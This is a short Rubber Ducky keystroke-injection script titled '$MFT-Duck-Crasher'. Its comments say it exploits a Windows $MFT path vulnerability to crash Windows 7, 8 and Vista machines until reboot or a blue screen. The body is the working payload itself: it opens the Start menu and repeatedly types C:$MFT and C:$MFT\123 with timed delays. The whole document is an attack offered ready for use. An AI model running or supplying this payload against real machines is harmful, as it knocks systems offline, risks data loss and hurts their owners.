REM Title: $MFT-Duck-Crasher
REM Author: JonnyBanana
REM A Simple Script for Rubber Ducky which Exploits Windows $MFT Vulnerability.
REM $MFT is used by NTFS systems to manage some metadata. Works on windows 7, 8 and vista, dont work on windows 10. 
REM I think work on Xp and earlier. The system crash lasts until the machine is switched off, or until the blue screen of death appears
REM works on w7 - w8 - Vista (and i think xp and earlier too)
REM it uses a high delay to support even older computers
DELAY 1000
CONTROL ESCAPE
DELAY 500
STRING C:$MFT
DELAY 500
ENTER
DELAY 700
REM the 2nd enter is to close the error
ENTER
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING C:$MFT\123
DELAY 500
ENTER
DELAY 700
ENTER
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING C:$MFT
DELAY 500
ENTER
DELAY 700
ENTER
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING C:$MFT\123
DELAY 500
ENTER
DELAY 700
ENTER 
